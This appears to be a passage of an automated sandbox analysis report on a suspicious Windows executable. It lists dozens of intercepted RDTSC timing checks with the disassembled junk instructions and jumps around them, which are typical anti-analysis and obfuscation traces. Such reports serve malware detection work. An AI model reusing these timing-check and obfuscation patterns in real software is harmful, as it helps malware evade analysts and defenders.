                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9CB5B3 second address: 9CB5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE5B8D9CB67h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9D4B70 second address: 9D4B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9D449C second address: 9D44A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9D44A0 second address: 9D44A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9D4788 second address: 9D4799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FE5B8D9CB5Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9D4799 second address: 9D47A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DA91C second address: 9DA920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DAA95 second address: 9DAA9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DAED7 second address: 9DAEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB44D second address: 9DB46A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A753h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB46A second address: 9DB470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB470 second address: 9DB474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB474 second address: 9DB478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB478 second address: 9DB47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB47E second address: 9DB4CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop esi 0x0000000f pushad 0x00000010 jmp 00007FE5B8D9CB67h 0x00000015 jg 00007FE5B8D9CB56h 0x0000001b jnl 00007FE5B8D9CB56h 0x00000021 jmp 00007FE5B8D9CB5Eh 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9DB4CF second address: 9DB4DD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE5B8F4A748h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E1C60 second address: 9E1C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE5B8D9CB60h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E1C80 second address: 9E1C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E1C84 second address: 9E1C94 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE5B8D9CB56h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E1C94 second address: 9E1C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E1C9A second address: 9E1C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 92ED6C second address: 92ED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9E7DB5 second address: 9E7DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F5A8D second address: 9F5AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007FE5B8F4A74Eh 0x0000000c pushad 0x0000000d je 00007FE5B8F4A746h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54A7 second address: 9F54AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54AF second address: 9F54B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54B3 second address: 9F54C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FE5B8D9CB5Ch 0x00000010 jo 00007FE5B8D9CB56h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54C9 second address: 9F54D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54D1 second address: 9F54D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54D5 second address: 9F54D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9F54D9 second address: 9F54F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE5B8D9CB65h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9FFDEA second address: 9FFDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9FFDEE second address: 9FFE09 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE5B8D9CB61h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9FFE09 second address: 9FFE3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A750h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a je 00007FE5B8F4A79Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE5B8F4A753h 0x00000017 jg 00007FE5B8F4A746h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9FFE3F second address: 9FFE74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE5B8D9CB61h 0x00000012 jmp 00007FE5B8D9CB5Fh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A021E8 second address: A021F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jg 00007FE5B8F4A746h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A09D98 second address: A09D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A09D9C second address: A09DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A09DA2 second address: A09DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FE5B8D9CB56h 0x0000000d jne 00007FE5B8D9CB56h 0x00000013 pushad 0x00000014 popad 0x00000015 je 00007FE5B8D9CB56h 0x0000001b popad 0x0000001c jng 00007FE5B8D9CB5Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A09BD8 second address: A09C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE5B8F4A752h 0x0000000a jo 00007FE5B8F4A746h 0x00000010 jnp 00007FE5B8F4A746h 0x00000016 jmp 00007FE5B8F4A752h 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A0D16C second address: A0D170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A0D170 second address: A0D18E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FE5B8F4A74Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A0D18E second address: A0D1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB61h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A0D1A4 second address: A0D1A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A1176F second address: A1177A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A1177A second address: A1177E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A11A6A second address: A11A75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FE5B8D9CB56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A11D36 second address: A11D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A11E85 second address: A11E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A11E8B second address: A11E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A11E91 second address: A11E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A12038 second address: A12044 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A12044 second address: A1204A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A1218F second address: A12196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A16A5A second address: A16A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A16A5F second address: A16A6D instructions: 0x00000000 rdtsc 0x00000002 js 00007FE5B8F4A748h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A16A6D second address: A16A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A16A71 second address: A16A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A165CF second address: A16622 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE5B8D9CB68h 0x00000008 pop ecx 0x00000009 jp 00007FE5B8D9CB58h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FE5B8D9CB62h 0x00000019 jmp 00007FE5B8D9CB69h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A214DA second address: A2151C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE5B8F4A755h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FE5B8F4A759h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE5B8F4A74Ah 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A2151C second address: A21520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A21520 second address: A21530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE5B8F4A746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A4DBE1 second address: A4DBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A4DEB5 second address: A4DEC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FE5B8F4A746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A4E568 second address: A4E572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE5B8D9CB56h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A4E6F7 second address: A4E6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A4E6FB second address: A4E717 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE5B8D9CB60h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: A54426 second address: A54430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0875 second address: 50B087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B087B second address: 50B0925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE62AC02651h 0x0000000f jmp 00007FE5B8D9CB60h 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c jmp 00007FE5B8D9CB5Eh 0x00000021 pushfd 0x00000022 jmp 00007FE5B8D9CB62h 0x00000027 xor ecx, 194064B8h 0x0000002d jmp 00007FE5B8D9CB5Bh 0x00000032 popfd 0x00000033 popad 0x00000034 mov ecx, esi 0x00000036 jmp 00007FE5B8D9CB66h 0x0000003b je 00007FE62AC025FCh 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 jmp 00007FE5B8D9CB5Dh 0x00000049 call 00007FE5B8D9CB60h 0x0000004e pop esi 0x0000004f popad 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0925 second address: 50B092B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B092B second address: 50B09AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FA6968h], 00000002h 0x0000000f pushad 0x00000010 call 00007FE5B8D9CB64h 0x00000015 pop ebx 0x00000016 mov dh, cl 0x00000018 popad 0x00000019 jne 00007FE62AC025B9h 0x0000001f jmp 00007FE5B8D9CB69h 0x00000024 mov edx, dword ptr [ebp+0Ch] 0x00000027 pushad 0x00000028 mov ebx, 2173034Eh 0x0000002d popad 0x0000002e push ebx 0x0000002f jmp 00007FE5B8D9CB62h 0x00000034 mov dword ptr [esp], ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FE5B8D9CB67h 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B09AB second address: 50B09B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B09B1 second address: 50B09D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE5B8D9CB66h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B09D4 second address: 50B09D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B09D8 second address: 50B09DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B09DE second address: 50B09EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0A4C second address: 50B0A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0A52 second address: 50B0A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0A56 second address: 50B0A9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jmp 00007FE5B8D9CB5Bh 0x0000000e mov esp, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FE5B8D9CB5Bh 0x00000019 and cl, FFFFFFEEh 0x0000001c jmp 00007FE5B8D9CB69h 0x00000021 popfd 0x00000022 movzx esi, bx 0x00000025 popad 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50B0A9C second address: 50B0AE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FE5B8F4A756h 0x0000000b xor al, FFFFFF98h 0x0000000e jmp 00007FE5B8F4A74Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE5B8F4A755h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0D5E second address: 50C0DA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE5B8D9CB5Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FE5B8D9CB5Ch 0x00000019 sub cx, 5BB8h 0x0000001e jmp 00007FE5B8D9CB5Bh 0x00000023 popfd 0x00000024 push esi 0x00000025 pop edx 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0DA7 second address: 50C0DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0DAD second address: 50C0DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0DB1 second address: 50C0DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0A96 second address: 50C0B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE5B8D9CB66h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE5B8D9CB5Eh 0x00000018 add cl, FFFFFFF8h 0x0000001b jmp 00007FE5B8D9CB5Bh 0x00000020 popfd 0x00000021 call 00007FE5B8D9CB68h 0x00000026 pushfd 0x00000027 jmp 00007FE5B8D9CB62h 0x0000002c jmp 00007FE5B8D9CB65h 0x00000031 popfd 0x00000032 pop esi 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FE5B8D9CB5Ah 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0B2D second address: 50C0B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50C0B33 second address: 50C0B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
